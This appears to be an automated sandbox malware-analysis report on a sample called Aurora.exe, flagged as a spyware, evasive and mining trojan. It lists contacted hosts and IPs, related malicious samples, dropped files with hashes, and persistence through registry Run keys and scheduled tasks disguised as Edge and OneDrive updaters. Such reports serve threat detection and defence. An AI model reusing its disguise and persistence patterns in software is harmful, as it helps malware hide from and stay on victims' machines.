                            http://tempuri.org/Endpoint/EnvironmentSettingsResponsebuild.exe, 00000004.00000002.2937734948.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002956000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.000000000292D000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002940000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aka.ms/pscore68powershell.exe, 00000016.00000002.1775465681.0000028FAF621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2050954318.000002942EC91000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://ipwho.is/OneDrive.exe, 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://127.0.0.1/dashboardidAurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/soap/actor/nextbuild.exe, 00000004.00000002.2937734948.0000000002891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://t.me/cheshire_auroraAurora.exe, 00000000.00000002.2198132330.00000000096C2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://tempuri.org/Endpobuild.exe, 00000004.00000002.2937734948.0000000002970000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            192.64.119.108
                            auroraforge.artUnited States
                            22612NAMECHEAP-NETUStrue
                            154.81.220.233
                            unknownSeychelles
                            35916MULTA-ASN1UStrue
                            123.123.123.123
                            thesirenmika.comChina
                            4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNtrue
                            51.79.71.77
                            unknownCanada
                            16276OVHFRtrue
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1483204
                            Start date and time:2024-07-26 20:44:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 35s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:65
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Aurora.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.mine.winEXE@91/34@3/4
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 92%
                            • Number of executed functions: 151
                            • Number of non-executed functions: 74
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, schtasks.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 52.182.143.212, 52.168.117.173
                            • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 3320 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7388 because it is empty
                            • Execution Graph export aborted for target powershell.exe, PID 7764 because it is empty
                            • Execution Graph export aborted for target vlc.exe, PID 7316 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: Aurora.exe
                            TimeTypeDescription
                            14:45:04API Interceptor1x Sleep call for process: vlc.exe modified
                            14:45:06API Interceptor96x Sleep call for process: powershell.exe modified
                            14:45:20API Interceptor1x Sleep call for process: dw20.exe modified
                            14:45:55API Interceptor2583x Sleep call for process: Msedge.exe modified
                            14:46:05API Interceptor257x Sleep call for process: conhost.exe modified
                            19:45:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Local\Msedge.exe
                            19:45:07Task SchedulerRun new task: OneDriveUpdate path: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive s>Updater.exe
                            19:45:12Task SchedulerRun new task: ConsoleWindowsHost path: C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe
                            19:45:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDriveUpdate C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe
                            19:45:22AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Local\Msedge.exe
                            19:45:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDriveUpdate C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            123.123.123.123oN18LjALvG.exeGet hashmaliciousMetasploitBrowse
                              oN18LjALvG.exeGet hashmaliciousMetasploitBrowse
                                Lo5o3Ugla7.elfGet hashmaliciousUnknownBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  xmr-us-east1.nanopool.orgdaRNfwifay.exeGet hashmaliciousXmrigBrowse
                                  • 51.222.106.253
                                  vilxost.dllGet hashmaliciousXmrigBrowse
                                  • 144.217.14.139
                                  vilxost.dllGet hashmaliciousXmrigBrowse
                                  • 142.44.243.6
                                  dllhost.exeGet hashmaliciousNanominerBrowse
                                  • 192.99.69.170
                                  4rC1bQcnl5.exeGet hashmaliciousXmrigBrowse
                                  • 144.217.14.139
                                  LZF5sOWnss.exeGet hashmaliciousXmrigBrowse
                                  • 144.217.14.139
                                  4HoFnQosUb.exeGet hashmaliciousXmrigBrowse
                                  • 142.44.242.100
                                  P7Oa6i5muL.exeGet hashmaliciousXmrigBrowse
                                  • 142.44.242.100
                                  H9QnI1DbC1.exeGet hashmaliciousXmrigBrowse
                                  • 144.217.14.139
                                  7xhLwiPIrR.exeGet hashmaliciousXmrigBrowse
                                  • 142.44.243.6
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  OVHFRhttps://new-sneww-online-nowz-all.azurewebsites.net/?referrer=appmetrica_tracking_id%3D173005530304969909%26ym_tracking_id%3D10094745761516744100Get hashmaliciousUnknownBrowse
                                  • 54.36.150.186
                                  FkJbps6Srrl6lOQ9M_l8dpw2.exeGet hashmaliciousRedLineBrowse
                                  • 51.195.145.80
                                  VvlYJBzLuW.elfGet hashmaliciousMiraiBrowse
                                  • 37.59.105.215
                                  7Y18r(169).exeGet hashmaliciousCryptOneBrowse
                                  • 51.81.194.202
                                  Endermanch@Antivirus.exeGet hashmaliciousBdaejecBrowse
                                  • 54.39.157.64
                                  Endermanch@Antivirus.exeGet hashmaliciousBdaejecBrowse
                                  • 54.39.157.64
                                  file.exeGet hashmaliciousSystemBCBrowse
                                  • 144.217.158.194
                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                  • 51.77.140.74
                                  file.exeGet hashmaliciousSystemBCBrowse
                                  • 192.99.8.97
                                  LisectAVT_2403002A_126.EXE.exeGet hashmaliciousWannacry, ContiBrowse
                                  • 167.114.35.28
                                  NAMECHEAP-NETUSTNS71092E68UI0.vbeGet hashmaliciousFormBookBrowse
                                  • 198.54.117.242
                                  file.exeGet hashmaliciousSystemBCBrowse
                                  • 198.54.120.214
                                  LisectAVT_2403002A_333.exeGet hashmaliciousUnknownBrowse
                                  • 198.54.125.89
                                  LisectAVT_2403002A_333.exeGet hashmaliciousUnknownBrowse
                                  • 198.54.125.89
                                  LisectAVT_2403002A_87.exeGet hashmaliciousFormBookBrowse
                                  • 162.0.236.122
                                  LisectAVT_2403002A_97.exeGet hashmaliciousDarkVision RatBrowse
                                  • 198.54.126.102
                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                  • 68.65.122.150
                                  LisectAVT_2403002B_309.exeGet hashmaliciousBdaejec, FormBookBrowse
                                  • 162.0.225.191
                                  LisectAVT_2403002B_412.exeGet hashmaliciousFormBookBrowse
                                  • 162.0.238.43
                                  LisectAVT_2403002C_119.exeGet hashmaliciousBdaejec, SodinokibiBrowse
                                  • 198.54.121.233
                                  MULTA-ASN1USLisectAVT_2403002A_328.exeGet hashmaliciousPetite VirusBrowse
                                  • 154.85.69.4
                                  LisectAVT_2403002A_328.exeGet hashmaliciousPetite VirusBrowse
                                  • 154.85.69.3
                                  m68k.elfGet hashmaliciousMiraiBrowse
                                  • 198.74.126.182
                                  zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                  • 43.226.24.137
                                  Suav289vuI.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 173.82.220.236
                                  http://www.fotoschuppen.net/Get hashmaliciousUnknownBrowse
                                  • 154.85.69.7
                                  https://telegram-up.org/Get hashmaliciousUnknownBrowse
                                  • 154.85.69.7
                                  http://metamask-zhwallet.org/Get hashmaliciousUnknownBrowse
                                  • 154.85.69.2
                                  http://cdn.bootcdn.netGet hashmaliciousUnknownBrowse
                                  • 154.85.69.3
                                  https://www.bzqmgs.com/Get hashmaliciousUnknownBrowse
                                  • 154.85.69.2
                                  CHINA169-BJChinaUnicomBeijingProvinceNetworkCNAKPSrAWl2G.elfGet hashmaliciousMiraiBrowse
                                  • 123.118.80.54
                                  oeMGRI6v4U.exeGet hashmaliciousPhorpiexBrowse
                                  • 121.52.212.161
                                  oeMGRI6v4U.exeGet hashmaliciousPhorpiexBrowse
                                  • 121.52.212.161
                                  xd.mips.elfGet hashmaliciousMiraiBrowse
                                  • 121.69.128.127
                                  chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                  • 103.102.202.144
                                  chAJcIK6ZO.exeGet hashmaliciousUnknownBrowse
                                  • 103.102.202.144
                                  http://worker-royal-cake-d668.20030725gg.workers.dev/Get hashmaliciousUnknownBrowse
                                  • 115.182.9.46
                                  http://stone003.stone168.cloudns.org/Get hashmaliciousUnknownBrowse
                                  • 115.182.216.178
                                  http://jaqi.ivcc742.workers.dev/Get hashmaliciousUnknownBrowse
                                  • 115.182.216.178
                                  http://cloud.15922894802.workers.dev/Get hashmaliciousUnknownBrowse
                                  • 115.182.9.46
                                  No context
                                  No context
                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9863964828587074
                                  Encrypted:false
                                  SSDEEP:192:aX745RqZgjAzC9OsVrHxdzuiFyZ24IO8:CU5RZjzzuiFyY4IO8
                                  MD5:436A719B852035763B89070D3F0421F9
                                  SHA1:EA7C3A16E3C9596991EB34AC5EDAD35F57F382A3
                                  SHA-256:679A68FCA8B9F0A9067ED01568E8559A1C4DF2090FBDD6F41982A1AC66D7424F
                                  SHA-512:8D21E8D0127639D866FBB3A6F51AB5ACFC3ACA6C0708798A220B416BC73C30A549D8910066F177FD15A27EB1A54C7B002BCE568E83B32BF41907E0DDC3369BD1
                                  Malicious:false
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.4.9.3.1.0.5.6.1.6.9.1.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.4.9.3.1.0.6.3.2.0.0.4.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.d.2.e.6.3.e.-.4.b.a.d.-.4.3.b.e.-.8.3.9.3.-.f.a.b.0.a.7.e.1.e.c.7.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.A.u.r.o.r.o.r.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.7.0.-.0.0.0.1.-.0.0.1.4.-.7.4.e.d.-.4.f.e.b.8.b.d.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.a.8.a.5.7.a.4.1.2.4.f.6.b.9.3.5.b.d.9.f.c.9.4.b.1.5.6.f.5.a.a.0.0.0.0.0.0.0.0.!.0.0.0.0.3.1.4.2.4.5.3.c.1.8.0.8.0.b.8.3.d.8.d.b.d.e.b.a.8.9.5.2.4.b.e.e.a.1.c.9.4.f.f.3.!.A.u.r.o.r.a...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.3././.0.5././.0.1.:.0.2.:.2.9.:.0.8.!.1.5.5.3.3.f.5.!.A.u.r.o.r.a...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):85810
                                  Entropy (8bit):3.0223880728414274
                                  Encrypted:false
                                  SSDEEP:1536:w3fFGgDQrKK4hi845fP928rTly+QhZRQz0GhCIS:w3fFGgDQrKK4hi845fP928rTly+QhZGM
                                  MD5:347B61B287DC53FC46885FEDA85A3243
                                  SHA1:861276C2AF905C49E49C98D8D718251FC1C4B0CA
                                  SHA-256:81A4E10A000F163E7C2DAFAA6A18AE9BB9A634D65D653B068F06E5212C648EDC
                                  SHA-512:B54577CD91EAFFAF031652B2902FBAD84C7E5F5CB48DAE41200487CD50A0E68BF0DC191D5DC2E7A05AE71116AA0E765D49D706F0866ED9883923AE00BB730F66
                                  Malicious:false
                                  Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):13340
                                  Entropy (8bit):2.685373579737895
                                  Encrypted:false
                                  SSDEEP:96:TiZYWxT8x/fYIYJWhHzYEZ4FtEiX4OKcTwv8yvKa5HUaqjVyMvThVy4I1mn3:2ZDx+foU8sKa5HpRMvThVS1mn3
                                  MD5:DED99C4119CDBC0FC8EFEE43A3F4979B
                                  SHA1:14BD36A0A3A6689BE0A3CA564CB1154E7CB96300
                                  SHA-256:F851E4A19089EF96AEB92FE621022B576C520609FEA42345D3E81EB695BD298F
                                  SHA-512:D66C491AAEDBBE5139354A3AD51251337063F5A0EDF952F3A63EC62A958F5E1B97B28F88D61089215AF57B7EF4C5970EB4EE2F2B633056C28AB6D5C52CBD84A1
                                  Malicious:false
                                  Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):7694
                                  Entropy (8bit):3.7035921239339467
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJc06o6Y9PSU95TgmfZaZp14+1fhIm:R6lXJf6o6Y1SU95TgmfQF40fb
                                  MD5:18E8AD1737AC0F6A3B68677B82E5C365
                                  SHA1:10FE87E258221D7D076E7F24802063A2AB28E991
                                  SHA-256:C3F9DB4D456041A055FA36CF80EE1D34BC8F963D82C9405E535873BA72FEC1B1
                                  SHA-512:F87A5A896DCD07E13BC3C435B05591843FA29382E41F232AFF1FC1A598BEBEE029ECC63596DC618DBBC32FC58AF913EC319E4CE298D0734CDE2643BEA7B80382
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.5.6.<./.P.i.
                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4707
                                  Entropy (8bit):4.487991183401193
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zszNJg77aI9K9WpW8VYLYm8M4JFK/jQFV+q8vyjvt/mAk9ieoK27d:uIjfbI7wM7VPJFK/UKyLEAkkeoK27d
                                  MD5:C0FCB9903FC15991200D2BFC7C1FEC1D
                                  SHA1:B5AF48DD3496B527BC29B8ED47D5658FFF1C3855
                                  SHA-256:3F465734A7BBAA5DFF791395703145EE8B90D1D9AA03176DC71E0744DFC2895A
                                  SHA-512:8B87B8C430A728F1ED874C67F1971DBF866678B8CD57E98D9C37845037AEE729D2466CDA778A2F583BB77AFEC3F62717276A47E8E3484D7208A56AF13B49DEAB
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="428267" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):321
                                  Entropy (8bit):5.36509199858051
                                  Encrypted:false
                                  SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAv
                                  MD5:3C63E66D9AEEF8DBC085D1459854EE3E
                                  SHA1:770A084649B3A7D9CB0CF1A5B922FE2AC9D59122
                                  SHA-256:06DF1E84C6419E6B0752C1CFD1B9D51A5D3EC1BC44513B5C1EB7400FA18760C4
                                  SHA-512:8626E48E0854AC46C4024F00A6FF170EFE896C06D2E37022FE6F757FBD933EEE00E97D977F5B13CA5A41822651E32469B152778B04296657E0B4F19DEF18F103
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                  Process:C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):321
                                  Entropy (8bit):5.36509199858051
                                  Encrypted:false
                                  SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAv
                                  MD5:3C63E66D9AEEF8DBC085D1459854EE3E
                                  SHA1:770A084649B3A7D9CB0CF1A5B922FE2AC9D59122
                                  SHA-256:06DF1E84C6419E6B0752C1CFD1B9D51A5D3EC1BC44513B5C1EB7400FA18760C4
                                  SHA-512:8626E48E0854AC46C4024F00A6FF170EFE896C06D2E37022FE6F757FBD933EEE00E97D977F5B13CA5A41822651E32469B152778B04296657E0B4F19DEF18F103
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1119
                                  Entropy (8bit):5.345080863654519
                                  Encrypted:false
                                  SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0Hj
                                  MD5:E6726BABA80C39624BADA32F0CCE6B54
                                  SHA1:4C769FA8A02DBE33AA9084040A9E6C70230334FA
                                  SHA-256:6A9F9C628B47AFC2A34A71826450A12D9293709BF977E72C04102F9DDD3705E0
                                  SHA-512:BBCCE0FCC59D29116253E71ECC786B8E3BA19D9A3124F36FEC9963C7F47016F145C76C18C5AD0FB6186ADEA69652BA99F29EF5AB5E71EFDD7EC07A82BB366960
                                  Malicious:false
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\System32\cmd.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):81920
                                  Entropy (8bit):6.050968204460563
                                  Encrypted:false
                                  SSDEEP:1536:pTrGHaLZS5k/fTO7UKkCTYHm2aopjB2UcSkZmi/ndOLUL:EHaLkS/XS6aop9Bj6HndOLU
                                  MD5:65F0A85C4B056D6BCEE60C49E2372E35
                                  SHA1:6AF820A2030950617BF150777AF4A43A06A17184
                                  SHA-256:D64768EA74224057220BFF451504B6128DDFB6161617B668626C490C84B3AE8E
